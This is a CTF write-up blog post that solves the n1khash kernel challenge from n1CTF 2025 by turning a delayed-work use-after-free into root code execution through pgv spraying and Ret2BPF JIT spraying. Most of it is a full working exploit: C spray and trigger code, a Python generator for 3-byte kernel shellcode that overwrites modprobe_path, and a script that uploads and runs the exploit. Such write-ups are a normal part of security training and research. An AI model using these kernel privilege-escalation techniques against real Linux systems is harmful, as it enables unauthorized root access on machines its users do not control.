Use BPFJIT to solve khash from n1CTF 2025

Exploit a kernel UAF without leaking any address.

In short…

  • N1khash has delayed work UAF, which contains a vtable.
  • We do pgv spray to reclaim the UAF slot in kmalloc-256.
  • We setup pgv content as (0xffffffffc1000000 - 0x800), which is basically a kernel one-gadget in our sprayed BPF JITed code.
  • Wait for the delayed work been executed and wins, no need to do any leak.

The vulnerability

When opening /dev/khash, the module allocates a control structure in kmalloc-256 without any isolation:

The khash can schedule delayed work, when the work is executed, it will invoke two functions from vtable inside the control structure:
(Both vtable[0] and vtable[1] will be called)

To queue a delayed, we can use 0x4010B110 ioctl:

If we close the fd before the delayed work is executed, the control structure will be freed and when the work is executed, it will get vtable from a freed kmalloc-256 chunk.

Exploit plan

From now on, we can already gain two free Control-Flow-Hijack primitives.

I have discussed what can we do with a pure CFH at my previous writeup about corCTF, but most of them at least require an kernel .text leak to perform ROP (panic_on_oops disable, RetSpill, NPerm or regular stack pivoting).

However this challenge has not enable kvm when booting the kernel, so it’s not trivial to bypass KASLR with hardware side channel.

We may certainly reverse the khash module more and see if there is any good info leak, but I decided to use Ret2BPF directly which does not require any info leak.

Thanks to the challenge author who provided the Kconfig so that we can quickly check BPF_JIT is enabled (which is so nice that we do not need to guess the kernel config once and once again).
And we can also see STATIC_USERMODE_HELPER is not set so our shellcode can be much simpler with just modifying modprobe_path or core_pattern instead of performing a ret2usr or task_struct search.

Also please note that unprivileged_bpf_disabled is not relevant with the cBPF spray in Ret2BPF, so we do not need to care about it.

Exploit! Exploit! Exploit!

Before we actually went to CFH, we need to prepare a structure belongs to kmalloc-256 which at 0x28 offset is a data pointer that the data it points to will be controlled by us.

I choose pgv array as a good candidate, since it will be a elastic array which every element is a pointer points to a shared memory which fully controlled by user.

1
2
3
struct pgv {
char *buffer; // points to a kernel-user shared memory
}; // allocated as array with GFP_KERNEL

By using pgv[32] to reclaim freed khash control structure, we can setup the vtable and control the function pointer without any info leak.

Then the only thing left is to spray our cBPF program to get a JITed native code area, the allocation address of BPF JITed code is highly predictable and if we spray enough (0x600 programs with 0x900 length each in this exploit).

By simply setting the function pointer to 0xffffffffc1000000 - 0x800, we can jump to the middle of our sprayed BPF JITed code.

You can find more details about Ret2BPF in the original writeup and recent discussion.

Since x86 is Variable-Length Instruction Set Architecture, we can spray LOAD CONSTANT instructions to load arbitrary 32-bit constant (without BPFJIT hardening). We can certainly jump to the middle of those 32-bit constants to trick CPU to interpret them as our shellcode.

The original Ret2BPF use 0xb3909090 as nop sled, so that the LOAD CONSTANT instruction 0xb8xxxxxx : (mov eax, 0xxxxxxxxx) can be interpreted as .. 90 b8 b3 90 90 90 (b8 b3 : mov bl).

At the end of the sled, we can place our 3-byte length shellcodes to do the actual privilege escalation.

So the main logic of exploit is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int main() {
init();

bpf_jit_spray(); // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
puts("BPF JIT spray done.");

if (fork() == 0) { // setup ns and ready for pgv spray
spray_pgv_thread();
}

int dev = open(DEV_PATH, O_RDWR | O_CLOEXEC);
uint8_t buf[0x100];
memset(buf, 0x41, sizeof(buf));

struct kh_queue_req req = {
.digest_ptr = (uint64_t)(uintptr_t)buf,
.count = ((uint64_t)1000 << 32) | 0x100
};
SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

close(dev); // free the control block
write(cmd_pipe_req[1], void_buf, 1); // reclaim it with pgv[32] array
read(cmd_pipe_reply[0], void_buf, 1);
puts("pgv spray done");

while (check_modprobe() == 0)
sleep(1);
puts("Win !!");
system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/2\n/bin/chmod 777 /tmp/2\n'>/tmp/1");
system("chmod +x /tmp/1");
socket(AF_INET, SOCK_STREAM, 132);
system("cat /tmp/2");
}

The full exploit code can be found at the end of this writeup.

Misc notes

modprobe_path

This commit at about Linux 6.2 removed usage of binfmt so that executing a unknown binary format will not invoke modprobe anymore. But we can still use some unprivileged syscall to force kernel load more kernel modules (which is compiled but not loaded by default), such as:

1
socket(AF_INET, SOCK_STREAM, 132);

This trick is also been discussed and well studied in SyzBridge.

Shellcode

The original copy_from_user shellcode is good enough, but if we want to perform more complex operations in the shellcode, we can disable the WP bit and copy shellcode from user memory to kernel executable memory and then jump to it.

End of the Trail

After all those merciless 48h CTF events, it’s sweet to have a 24h CTF and enjoy the rest of weekend at beach 🥰

Full exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
#define _GNU_SOURCE
#include <assert.h>
#include <dirent.h>
#include <endian.h>
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <pthread.h>
#include <sched.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/timerfd.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define SYSCHK(x) \
({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})

/* =========================== pgv spray =========================== */
#include <sys/socket.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include <net/ethernet.h>
#ifndef TPACKET_V3
#define TPACKET_V3 2
#endif
int cmd_pipe_req[2], cmd_pipe_reply[2];
#define SPRAY_PG_VEC_NUM 20
#define PAGE_NUM (256 / 8)
int pgfd[SPRAY_PG_VEC_NUM] = {};
void *pgaddr[SPRAY_PG_VEC_NUM] = {};

/* create an isolate namespace for pgv */
void unshare_setup(void) {
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

struct tpacket_req3 {
unsigned int tp_block_size; /* Minimal size of contiguous block */
unsigned int tp_block_nr; /* Number of blocks */
unsigned int tp_frame_size; /* Size of frame */
unsigned int tp_frame_nr; /* Total number of frames */
unsigned int tp_retire_blk_tov; /* timeout in msecs */
unsigned int tp_sizeof_priv; /* offset to private data area */
unsigned int tp_feature_req_word;
};

void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv, unsigned int timeout) {
int v = TPACKET_V3;
SYSCHK(setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)));

struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;

SYSCHK(setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)));
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
int s = SYSCHK(socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)));
packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, sizeof_priv, timeout);
struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
SYSCHK(bind(s, (struct sockaddr *)&sa, sizeof(sa)));
return s;
}

char void_buf[1] = {0};
void spray_pgv_thread() {
unshare_setup();
read(cmd_pipe_req[0], void_buf, 1);
for (int i = 0; i < SPRAY_PG_VEC_NUM; i++){
pgfd[i] = packet_socket_setup(0x1000, 2048, PAGE_NUM, 0, 10000);
}

for (int i = 0; i < SPRAY_PG_VEC_NUM; i++){
if (!pgfd[i])
continue;
pgaddr[i] = mmap(NULL, PAGE_NUM * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, pgfd[i], 0);
for (int j = 0; j < PAGE_NUM; j++) {
unsigned long *pgv_buff = pgaddr[i] + j * 0x1000;
pgv_buff[0] = 0xffffffffc1000000 - 0x800;
}
}
write(cmd_pipe_reply[1], void_buf, 1);

sleep(999);
exit(0);
}
/* =========================== pgv spray =========================== */

/* ========================= BPF JIT spray ========================= */
struct sock_filter filter[0x1000];
char buf[0x1000];
int bpf_jit_spray(void) {

char *shellcode = (void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE |
PROT_EXEC, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
strcpy(shellcode, "/tmp/1");

int stopfd[2];
SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, stopfd));

unsigned int prog_len = 0x900; // In current environment, the max instructions in a program is near 0x900
struct sock_filter table[] = {
{.code = BPF_LD + BPF_K, .k = 0xb3909090}, // 0xb3909090 is NOPsled shellclode to make exploitation more reliable (b3 b8 mov bl, 0xb8)
{.code = BPF_RET + BPF_K, .k = SECCOMP_RET_ALLOW}
};

for (int i = 0; i < prog_len; i++) {
filter[i] = table[0];
}

filter[prog_len - 1] = table[1];
int idx = prog_len - 2;

#include "sc.h"

struct sock_fprog prog = {
.len = prog_len,
.filter = filter,
};

int fd[2];
int fork_limit = 0x30;
for (int k = 0; k < fork_limit; k++) {
if (fork() == 0) {
close(stopfd[1]); // use fork to bypass RLIMIT_NOFILE limit.
for (int i = 0; i < 0x20; i++) {
SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
SYSCHK(setsockopt(fd[0], SOL_SOCKET, SO_ATTACH_FILTER, &prog, sizeof(prog)));
}
write(stopfd[0], buf, 1);
read(stopfd[0], buf, 1);
exit(0);
}
}
read(stopfd[1], buf, fork_limit); /* wait for all forks to finish spraying BPF code */
}

int check_modprobe() {
char buf[0x100] = {};
int modprobe = open("/proc/sys/kernel/modprobe", O_RDONLY);
read(modprobe, buf, sizeof(buf));
printf("modprobe: %20s\n", buf);
close(modprobe);
char* old = "/sbin/modprobe";
return strncmp(buf, old, strlen(old)) != 0;
}
/* ========================= BPF JIT spray ========================= */

#define DEV_PATH "/dev/n1khash"
#define KH_IOCTL_QUEUE 0x4010B110

struct kh_queue_req {
uint64_t digest_ptr; // user buffer pointer (if used by driver)
uint64_t count; // hi: delay (ms), lo: size (bytes, 16-byte aligned, <= 0x1000)
};

void init() {
setbuf(stdout, NULL);
setbuf(stderr, NULL);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);
// pin_on_cpu(0);

struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
setrlimit(RLIMIT_NOFILE, &rlim);

// Ignore SIGPIPE
signal(SIGPIPE, SIG_IGN);
}

int main() {
init();

bpf_jit_spray(); // 0xffffffffc1000000 - 0x800 will be our kernel one gadget
puts("BPF JIT spray done.");

if (fork() == 0) { // setup ns and ready for pgv spray
spray_pgv_thread();
}

int dev = open(DEV_PATH, O_RDWR | O_CLOEXEC);
uint8_t buf[0x100];
memset(buf, 0x41, sizeof(buf));

struct kh_queue_req req = {
.digest_ptr = (uint64_t)(uintptr_t)buf,
.count = ((uint64_t)1000 << 32) | 0x100
};
SYSCHK(ioctl(dev, KH_IOCTL_QUEUE, &req));

close(dev); // free the control block
write(cmd_pipe_req[1], void_buf, 1); // reclaim it with pgv[32] array
read(cmd_pipe_reply[0], void_buf, 1);
puts("pgv spray done");

while (check_modprobe() == 0)
sleep(1);
puts("Win !!");
system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag\n' > /tmp/1");
system("chmod +x /tmp/1");
socket(AF_INET, SOCK_STREAM, 132);
system("cat /tmp/flag");
}

Generate sc.h with the following python script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/env python3

from pwn import *
import struct

entry_syscall = 0xffffffff82800080 # entry_SYSCALL_64
modprobe_path = 0xffffffff84194620
copy_from_user = 0xffffffff81b6ffa0
msleep = 0xffffffff81271380

off1 = entry_syscall - modprobe_path
off2 = modprobe_path - copy_from_user
off3 = copy_from_user - msleep


context.arch = 'amd64'


def load_reg(_reg, _val): # reg is base reg, add / dec _val
ins = ["sub", "add"]
return f'''
xor esi,esi
mov sil, {(abs(_val) >> 24) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 16) & 0xff}
shl esi, 8
mov sil, {(abs(_val) >> 8) & 0xff}
shl esi, 8
mov sil, {(abs(_val)) & 0xff}
{ins[_val < 0]} {_reg}, rsi
'''


ASM = f"""
; do rdmsr(MSR_LSTAR) so EDX and EAX will contain address of entry_SYSCALL_64; ECX should be MSR_LSTAR ( 0xc0000082 )
xor edx, edx
mov cl, 0xc0
shl ecx, 24
mov cl, 0x82
rdmsr
; make rdx = entry_SYSCALL_64's address
mov cl, 32
shl rdx, cl
add rdx, rax
; entry_SYSCALL_64 + offset = core_pattern
; move core_pattern to rdi ( 1st arg )
{load_reg('rdx', off1)}
mov rdi, rdx
; move copy_from_user to rax
{load_reg('rdx', off2)}
mov rax, rdx
; call copy_from_user(core_pattern, user_buf, 0x30); user_buf = 0xa00000
xor esi, esi
mov sil, 0xa0
shl esi, 16
xor edx, edx
mov dl, 0x30
push rax
call rax
pop rax
{load_reg('rax', off3)}
; move 0x7000000 to rdi ( 1st arg )
xor edi,edi
mov dil,0x70
shl edi,20
call rax
"""
# msleep is better than jmp $+0


with open("sc.h", "w") as f:
for a in ASM.strip().split("\n")[::-1]:
if a.strip() == '' or a[0] == ';':
continue
cur = asm(a)
assert len(cur) <= 3
cur = hex(struct.unpack('<I', cur.ljust(3, b'\x90') + b'\x3c')[0])
sc = "filter[idx--] = (struct sock_filter){.code = BPF_LD+BPF_K, .k = " + cur + "};"
print(sc)
f.write(sc + "\n")

Interactive with remote:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import os, base64, gzip
from pwn import *
from tqdm import tqdm
import subprocess

TMP_PATH = "/tmp"
SEP = b"bash-5.2$ "


os.system("python3 gen.py")
os.system("musl-gcc --static 1.c -o exploit")
with open("exploit", "rb") as f_in, gzip.open("exp.gz", "wb") as f_out:
f_out.write(f_in.read())

with open("exp.gz", "rb") as f:
exp = base64.b64encode(f.read())

# p = remote("60.205.163.215", 42675)
p = process(['./run.sh'])

print(p.recvuntil(SEP).decode())
for i in range(0, len(exp), 0x200):
p.sendline(b"echo -n \"" + exp[i:i + 0x200] + f"\" >> {TMP_PATH}/b64_exp".encode())

for i in tqdm(range(0, len(exp), 0x200)):
p.recvuntil(SEP)

p.sendline(b"ls")
p.sendlineafter(SEP, f"cat {TMP_PATH}/b64_exp | base64 -d > {TMP_PATH}/exp.gz".encode())
p.sendlineafter(SEP, f"gzip -dc {TMP_PATH}/exp.gz > {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"chmod +x {TMP_PATH}/exploit".encode())
p.sendlineafter(SEP, f"{TMP_PATH}/exploit".encode())
p.interactive()

Use BPFJIT to solve khash from n1CTF 2025

https://ghostfrankwu.github.io/2025/11/02/2025n1/

作者

Frank Wu

发布于

2025-11-02

更新于

2025-11-03

许可协议